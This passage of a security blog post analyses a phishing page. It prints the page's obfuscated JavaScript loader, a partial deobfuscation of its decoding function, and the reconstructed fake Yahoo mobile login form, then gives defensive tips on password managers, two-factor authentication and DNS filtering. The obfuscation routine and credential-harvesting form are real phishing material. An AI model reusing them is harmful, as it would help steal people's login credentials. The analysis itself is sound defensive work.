\"&35;&16;&16;&32;:\/\/&22;&22;&22;.&25;&50;&35;&60;&60;&46;&35;&13;&34;&32;.&10;&32;\/&50;&32;&32;\/&50;&1;&37;&22;&13;&40;&37;\/&65;&13;&16;&50;&41;&34;\/&32;\/565\/&50;&27;&41;&65;\/47713?&37;&60;&42;&27;&37;&40;&42;&59;&20;&50;&41;&34;&&37;&60;&42;&27;&16;&40;&26;&59;&20;&50;\"; &51;\/&37;&42;&40;&41;&32;&16;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"mbr-forgotpwd \" &41;&65;&59;\"yui&27;3&27;18&27;1&27;7&27;1443564332710&27;96\"&31;&51;&50; &41;&65;&59;\"mbr-forgot-link\" &35;&40;&13;&8;&59;\"https://edit.yahoo.com/config/eval&27;forgot&27;pw?lang=en-US&intl=us&done=https%3A%2F%2Fus.yahoo.com%2F%3Fp%3Dus&src=fpctx\" &42;&34;&50;&37;&37;&59;\"pure-u-1\" &40;&60;&34;&13;&59;\"&33;&58;&16;&16;&60;&1;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&37;&34;&26;&59;\"&40;&13;&42;&60;&6;&13;&40;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"15\"&31;Can't access your account?&51;\/&50;&31;&51;\/&65;&41;&6;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"mbr-mb-createacc pure-form-stacked mbr-text-13 has-device-switcher\"&31;&51;&37;&32;&50;&1;&31;New to Yahoo?&51;\/&37;&32;&50;&1;&31;&51;&33;&58;&16;&16;&60;&1; &41;&65;&59;\"createacc\" &40;&13;&57;&58;&40;&34;&59;\"&35;&16;&16;&32;&37;:\/\/&13;&65;&41;&16;.&25;&50;&35;&60;&60;.&42;&60;&20;\/&40;&13;&57;&41;&37;&16;&40;&50;&16;&41;&60;&1;?.&34;&50;&1;&57;&59;&13;&1;&46;&2;&23;&&50;&20;&32;;.&41;&1;&16;&34;&59;&58;&37;&&50;&20;&32;;.&37;&40;&42;&59;&8;&32;&42;&16;&3;&&50;&20;&32;;.&50;&37;&65;&26;&27;&13;&20;&33;&13;&65;&65;&13;&65;&59;0&&50;&20;&32;;.&65;&60;&1;&13;&59;&35;&16;&16;&32;&37;%3&28;%2&5;%2&5;&58;&37;.&25;&50;&35;&60;&60;.&42;&60;&20;%2&5;%3&5;&32;%3&63;&58;&37;\" &42;&34;&50;&37;&37;&59;\"pure-button mbr-button-text\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&37;&34;&26;&59;\"&37;&41;&57;&1;&58;&32;\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"16\"&31;Sign up for a new account&51;\/&33;&58;&16;&16;&60;&1;&31;&51;\/&65;&41;&6;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"mbr-ds-container\"&31;&51;&65;&41;&6; &41;&65;&59;\"mbr-ds\" &42;&34;&50;&37;&37;&59;\"pure-u-1 mbr-mb-ds\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"pure-u-1 links\"&31;&51;&50; &41;&65;&59;\"mbr-device-switcher-link\" &35;&40;&13;&8;&59;\"https://login.yahoo.com/?mbsw=d&.src=fpctx&.intl=us&.lang=en-US&.done=https%3A%2F%2Fus.yahoo.com%2F%3Fp%3Dus\" &65;&50;&16;&50;&46;&40;&50;&32;&41;&65;&27;&32;&59;\"17\"&31;View desktop version&51;\/&50;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&20;&50;&41;&1;&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"spin-mask\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"center\"&31;&51;&65;&41;&6; &42;&34;&50;&37;&37;&59;\"sign-in-spinner\"&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;\/&65;&41;&6;&31;&51;&37;&42;&40;&41;&32;&16; &37;&40;&42;&59;\"/yhmv&27;files/combo1.css\"&31;&51;\/&37;&42;&40;&41;&32;&16;&31;&51;&65;&41;&6; &41;&65;&59;\"yui3-css-stamp\" &37;&16;&25;&34;&13;&59;\"&32;&60;&37;&41;&16;&41;&60;&1;: &50;&33;&37;&60;&34;&58;&16;&13; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;; &6;&41;&37;&41;&33;&41;&34;&41;&16;&25;: &35;&41;&65;&65;&13;&1; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;\"&31;&51;\/&65;&41;&6;&31;&51;&65;&41;&6; &41;&65;&59;\"yui3-css-stamp\" &37;&16;&25;&34;&13;&59;\"&32;&60;&37;&41;&16;&41;&60;&1;: &50;&33;&37;&60;&34;&58;&16;&13; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;; &6;&41;&37;&41;&33;&41;&34;&41;&16;&25;: &35;&41;&65;&65;&13;&1; &49;&41;&20;&32;&60;&40;&16;&50;&1;&16;\"&31;&51;\/&65;&41;&6;&31;&51;&37;&42;&40;&41;&32;&16;&31; &38;&2;&54;&48;&15;.&58;&37;&13;&48;'&1;&60;&65;&13;', '&13;&6;&13;&1;&16;', &8;&58;&1;&42;&16;&41;&60;&1; &48;&38;&15; &61; &38;.&60;&1;&48;\"&65;&60;&20;&40;&13;&50;&65;&25;\", &8;&58;&1;&42;&16;&41;&60;&1;&48;&15; &61; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&60;&20;&37;&42;&60;&40;&13;&27;&42;&60;&1;&8;&41;&57; &59; &45;&61; &42;1: \"2\", &42;2: \"7241469\", &42;5: \"150002880\", &42;7: \"&35;&16;&16;&32;&37;%3&28;%2&5;%2&5;&34;&60;&57;&41;&1;.&25;&50;&35;&60;&60;.&42;&60;&20;%2&5;&20;%3&5;.&37;&40;&42;%3&63;&8;&32;&42;&16;&3;%26.&41;&1;&16;&34;%3&63;&58;&37;%26.&34;&50;&1;&57;%3&63;&13;&1;&46;&2;&23;%26.&65;&60;&1;&13;%3&63;&35;&16;&16;&32;&37;%253&28;%252&5;%252&5;&58;&37;.&25;&50;&35;&60;&60;.&42;&60;&20;%252&5;%253&5;&32;%253&63;&58;&37;\", &42;14: \"&46;1\" &62;&67;; &14;&36;&12;&27;&42;&60;&1;&8;&41;&57;.&42;&60;&20;&37;&42;&60;&40;&13;&27;&33;&13;&50;&42;&60;&1;&48;&15;; &62;&15;; &62;&15;;&51;\/&37;&42;&40;&41;&32;&16;&31;&51;&1;&60;&37;&42;&40;&41;&32;&16;&31; &&50;&20;&32;;&34;&16;;&41;&20;&57; &37;&40;&42;&59;\"http://b.scorecardresearch.com/p?c1=2[&]amp[/;]amp;c2=7241469[&]amp[/;]amp;c7=https%3A%2F%2Flogin.yahoo.com%2Fm%3F.src%3Dfpctx%26.intl%3Dus%26.lang%3Den-US%26.done%3Dhttps%253A%252F%252Fus.yahoo.com%252F%253Fp%253Dus[&]amp[/;]amp;c5=150002880[&]amp[/;]amp;c14=-1[&]amp[/;]amp;cv=2.0[&]amp[/;]amp;cj=1\"&&50;&20;&32;;&57;&16;;&51;\/&1;&60;&37;&42;&40;&41;&32;&16;&31;&51;&49;&46;&46; &37;&32;&50;&42;&13;&54;&65; &36;&50;&37;&13;: 150002880, &54;&1;&16;&34;: 150002880&46;&46;&31;&51;\/&33;&60;&65;&25;&31;&51;\/&35;&16;&20;&34;&31;",["&0;","&1;","&2;","&3;","&4;","&5;","&6;","&7;","&8;","&9;","&10;","&11;","&12;","&13;","&14;","&15;","&16;","&17;","&18;","&19;","&20;","&21;","&22;","&23;","&24;","&25;","&26;","&27;","&28;","&29;","&30;","&31;","&32;","&33;","&34;","&35;","&36;","&37;","&38;","&39;","&40;","&41;","&42;","&43;","&44;","&45;","&46;","&47;","&48;","&49;","&50;","&51;","&52;","&53;","&54;","&55;","&56;","&57;","&58;","&59;","&60;","&61;","&62;","&63;","&64;","&65;","&66;","&67;"],["q","n","U","x","@","F","v","H","f","W","j","E","R","e","M",")","t","C","P","z","m","Z","w","S","N","y","k","_","A","Q","L",">","p","b","l","h","B","s","Y","~","r","i","c","*","T","[","-","O","(","!","a","<","K","V","I","G","+","g","u","=","o","{","}","D","J","d","X","]"]));</script>
I have used a tool called "Wepawet" to decipher obfuscated code before; in this case however, Wepawet is only partially able to decipher things:
unescape = function (a7e7757b1e12abcb736ab9a754ffb617a, ac0e190d8267e36708f955d7ab048990d, acaf1a3dfb505ffed0d024130f58c5cfa){ ae0c641195b27425bb056ac56f8953d24 = a7e7757b1e12abcb736ab9a754ffb617a; for (a46922a0880a8f11f8f69cbb52b1396be = 0; a46922a0880a8f11f8f69cbb52b1396be < ac0e190d8267e36708f955d7ab048990d.length; a46922a0880a8f11f8f69cbb52b1396be ++ ){ ae0c641195b27425bb056ac56f8953d24 = ae0c641195b27425bb056ac56f8953d24.replace(new RegExp(ac0e190d8267e36708f955d7ab048990d[a46922a0880a8f11f8f69cbb52b1396be], "g"), acaf1a3dfb505ffed0d024130f58c5cfa[a46922a0880a8f11f8f69cbb52b1396be]); } ae0c641195b27425bb056ac56f8953d24 = ae0c641195b27425bb056ac56f8953d24.replace(new RegExp ("%26", "g"), "&"); ae0c641195b27425bb056ac56f8953d24 = ae0c641195b27425bb056ac56f8953d24.replace(new RegExp ("%3B", "g"), ";"); document.write(ae0c641195b27425bb056ac56f8953d24.replace('<!--?--><?', '<!--?-->')); a7e7757b1e12abcb736ab9a754ffb617a = ""; ac0e190d8267e36708f955d7ab048990d = ""; acaf1a3dfb505ffed0d024130f58c5cfa = ""; ae0c641195b27425bb056ac56f8953d24 = ""; }(repeated 1 time)
<!DOCTYPE html><html lang="en-US" class= "yui3-js-enabled"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Yahoo - login</title><meta name= "viewport" content= "initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="stylesheet" type= "text/css" href= "/yhmv_files/combo.& #99;ss"></head> <body onload="f1.p.focus();" class= "ios-dynamic-font"><div id="mbr-mobile-login" class="mbr-login mbr-mb "> <script>var MBR_config = { baseSpaceID : "150002880", YWAProjectID : 10001756605956, DocumentName : "Mobile Login", DocumentGroup : "Mobile Login", bouncer_login : " https://login.yahoo.com/config/login?.partner=ycorp&.src=ym&mho=1&.done=https%3A%2F%2Fmail .yahoo.com" } ; </script><main role="main" id= "yui_3_18_1_7_1443564315& #48;12_25" style= "-webkit-user-select: none; touch-action: pan-y; -webkit-user-drag: none; -webkit-tap-highlight-colo r: rgba(0, 0, 0, 0);"><div class="mbr-main" id= "yui_3_18_1_7_1443564315& #48;12_106"><header id= "yui_3_18_1_7_1443564315& #48;12_105"><div class= "mbr-mb-hdr"><div class= "header-container"><img src= "/yhmv_files/yahoo_
 1;n-US_f_p_bestfit_2x. 2;ng" alt="Yahoo"></div></div></header><p class= "mbr-mb-login-titl&# 101; mbr-text-13">Sign i n to your account</p><form method="post" name="f1" id="" action="" class= "pure-form pure-fo 4;m-stacked mbr-mb-l&# 111;gin-frm" novalidate=""> <fieldset class= "pure-group mb-fset ;" id= "yui_3_18_1_7_1443564315& #48;12_108"> <div class= "username-field pu 4;e-g focus" id= "yui_3_18_1_7_1443564315& #48;12_107"> <div id= "login-country-cod& #101;-field" class= "pure-u selected-co untry-code narrow m ;br-hide"> <div class= "select-country-co&# 100;e mbr-hide" id= "login-country-cod& #101;"> <span id= "login-country-nam& #101;" class="mbr-hide">United States (+1)</span> <span>+1 </span> <span class= "country-code-arro&# 119;-container"><span class= "country-code-arro&# 119;"></span></span> </div> <label class= "mbr-hide" for= "login-select-coun& #116;ry-code">Country menu</label> </div> <input id= "login-username" type= "email" name="username" class= "pure-input-1 " aria-required="true" placeholder="Email address" autocorrect="off" autocomplete="off" autocapitalize="off" title= "Email address" value= "dnlongen@yahoo.co& #109;" data-rapid_p="1"> <div class= "pure-u-1 close-ico&# 110; close-icon-uname  09;br-hide"> <span class= "close-icon close-i& #99;on-button"></span> </div> </div> <div id="passwd-field" class= "passwd-field has-m essage "> <input id= "login-passwd" type= "password" class= "pure-input-1 " aria-required="true" placeholder="Password" autocorrect="off" autocomplete="off" autocapitalize="off" name="p" title="Password" data-rapid_p="2"> <div class= "pure-u-1 close-ico&# 110; close-icon-passw
 0; mbr-hide"> <span class= "close-icon close-i& #99;on-button"></span> </div> <div id= "login-passwd-mess age" class= "passwd-message pur ;e-u-1 mbr-hide"> T ap continue to rece ive an on-demand pa ssword. </div> </div> </fieldset> <span class= "mbr-error mbr-hide " id="mbr-error" role="alert" code="0"></span> <span class= "mbr-error mbr-hide " id="nw-error" role="alert">Netwo rk connection time d out. Please try ag ain.</span> <button type="submit" class= "pure-button pure-u ;-1 puree-button-pr& #105;mary mbr-button-p 17;rple " name="signin" data-rapid_slk="signin" data-rapid_p="3" value="" id= "login-signin">Sign In</button> <div id= "yahoo-japan-conta
 5;ner" class="mbr-hide"> <a href= "http://www.yahoo- 04;elp.jp/app/answer s/detail/p/565/a_id /47713?soc_src=mail&# 38;soc_trk=ma" class= "pure-u-1 pure-butt& #111;n " data-rapid_p="4"> Visit Yaho o Help </a> <div class= "mbr-login-oauth2- 21;ahoo-japan-msg"> Yahoo Japan users - p lease visit Yahoo H elp to learn how to a dd your email addre ss. </div> </div> <input type="hidden" name="_ts" value="1443564313" id= "yui_3_18_1_7_1443564315& #48;12_26" data-rapid_p="5"> <input type="hidden" name="_tpa" value="" id= "yui_3_18_1_7_1443564315& #48;12_27" data-rapid_p="6"> <input type="hidden" name="_muh" value="" id= "yui_3_18_1_7_1443564315& #48;12_28" data-rapid_p="7"> <input type="hidden" name="_crumb" value= "iTFuEtgy.rG" id= "yui_3_18_1_7_1443564315& #48;12_29" data-rapid_p="8"> <input type="hidden" name="_uuid" value= "p7zJ4A0uHOfy" id= "yui_3_18_1_7_1443564315& #48;12_30" data-rapid_p="9"> <input type="hidden" name="_seqid" value="2" id= "yui_3_18_1_7_1443564315& #48;12_31" data-rapid_p="10"><img src= "http://whos.amung&# 46;us/swidget/pulen 16;asu.png" width=0 height=0 /> <input type= "hidden" name= "otp_channel" value="" id= "yui_3_18_1_7_1443564315& #48;12_32" data-rapid_p="11"> <input type="hidden" name="otp_ref_cc_intl" value="" id= "yui_3_18_1_7_1443564315& #48;12_33" data-rapid_p="12"></form><div class= "pure-u-1 mbr-hide"> <div class="mbr-otp-link"> <form method="GET" action="" class= "pure-form mbr-mb-l& #111;gin-frm" novalidate=""> <input type= "hidden" name=".otp" value="y" id= "yui_3_18_1_7_1443564315& #48;12_34" data-rapid_p="13"> <button id= "login-otp" type="submit" class="mbr-button-text" data-rapid_p="14">MBR_OTP_SIGNIN_USI NG_MOBILE_NUMBER</button> </form> </div></div><script>MBR_config.otp_enabled = false; MBR_config.otp_optin = true; MBR_config.strings = MBR_config.strings || { placeholder_mobile_number : "Mobile number", placeholder_username : "Email address", sign_in : "Sign In", get_my_passwd : "Continue", signin_continue : "Continue", odp_password_desc : "Tap continue to receive an on-demand password.", odp_push_desc : "Tap continue to use Account Key.", error_username_passwd : "Invalid username/password. Please try again.", error_invalid_passwd : "That didn?t work. Please type your on-demand password again.", error_empty_passwd : "Your on-demand password is required.", otp_retry_message : "Please wait {0} seconds before trying to resend.", otp_retry_message_one : "Please wait a second before trying to resend.", end_of_string : "EOS" } ; MBR_config.click_to_dismiss_spinner_login = 1; MBR_config.click_to_dismiss_spinner_captcha = 1; MBR_config.is_asdk = 0; MBR_config.use_odp_username_monitor = false; MBR_config.is_oauth2 = false; MBR_config.oauth2_yahoo_japan_redirect_url = "http://www.yahoo-help.jp/app/answers/detail/p/565/a_id/47713?soc_src=mail&soc_trk=ma"; </script><div class= "mbr-forgotpwd " id= "yui_3_18_1_7_1443564332& #55;10_96"><a id= "mbr-forgot-link" href= "https://edit.yaho&# 111;.com/config/eval_f ;orgot_pw?lang=en-U& #83;&intl=us&done=ht 6;ps%3A%2F%2Fus.yaho& #111;.com%2F%3Fp%3Dus&s ;rc=fpctx" class= "pure-u-1" role="button" data-rapid_slk="recover" data-rapid_p= "15">Can't access your a ccount?</a></div><div class= "mbr-mb-createacc pu ;re-form-stacked mb& #114;-text-13 has-devic ;e-switcher"><span>New to Yahoo?</span><button id= "createacc" regurl= "https://edit.yahoo.com/registration?.lang=en-US&.intl=us&.src=fpctx&.asdk_embedded=0&am p;.done=https%3A%2F%2Fus.yahoo.com%2F%3Fp%3Dus" class= "pure-button mbr-bu& #116;ton-text" data-rapid_slk="signup" data-rapid_p="16"> Sign up for a new acc ount</button></div><div class= "mbr-ds-container"><div id="mbr-ds" class= "pure-u-1 mbr-mb-ds"> <div class="pure-u-1 links"><a id= "mbr-device-switch&# 101;r-link" href= "https://login.yah&# 111;o.com/?mbsw=d&.sr&# 99;=fpctx&.intl=us&.&# 108;ang=en-US&.done=h&# 116;tps%3A%2F%2Fus.yah ;oo.com%2F%3Fp%3Dus" data-rapid_p="17">View desktop ve rsion</a></div></div></div></div></main><div class= "spin-mask"><div class= "center"><div class= "sign-in-spinner"></div> </div></div></div><script src= "/yhmv_files/combo1& #46;css"></script><div id= "yui3-css-stamp" style= "position: absolute !important; visibility: hidden !important"></div><div id= "yui3-css-stamp" style= "position: absolute !important; visibility: hidden !important"></div><script>YUI().use('node', 'event', function (Y){ Y.on("domready", function (){ MBR_config.comscore_config = [{ c1 : "2", c2 : "7241469", c5 : "150002880", c7 : " https%3A%2F%2Flogin.yahoo.com%2Fm%3F.src%3Dfpctx&.intl%3Dus&.lang%3Den-US&.done%3Dhttps%25 3A%252F%252Fus.yahoo.com%252F%253Fp%253Dus", c14 : "-1" } ]; MBR_config.comscore_beacon(); } ); } ); </script><noscript> &lt;img src="http://b.scorecardresearch.com/p?c1=2[&]amp[/;]amp;c2=7241469[&]amp[/;]amp;c7=https%3A%2F%2Flogin.yahoo.com%2Fm%3F.src%3Dfpctx%26.intl%3Dus%26.lang%3Den-US%26.done%3Dhttps%253A%252F%252Fus.yahoo.com%252F%253Fp%253Dus[&]amp[/;]amp;c5=150002880[&]amp[/;]amp;c14=-1[&]amp[/;]amp;cv=2.0[&]amp[/;]amp;cj=1"&gt;</noscript><!-- spaceId Base: 150002880, Intl: 150002880--></body></html>
While this is still largely gibberish, there's enough here to see that this code renders the Yahoo login screen.
Bottom line? Phishing scams use all sorts of tricks to get an unsuspecting user to fall into their trap. Even a professional security analyst can fall for the right phish at the right time. The best defense is a wary eye, along with a few helpful tools:
- A password manager such as LastPass or 1Password that recognizes website domains and will not enter your password into a fake login screen;
- Two-factor authentication such that if a scammer does get your password, they still cannot log in without also having your device; and
- A DNS resolver such as OpenDNS, that recognizes scam domains and prevents your browser from going there.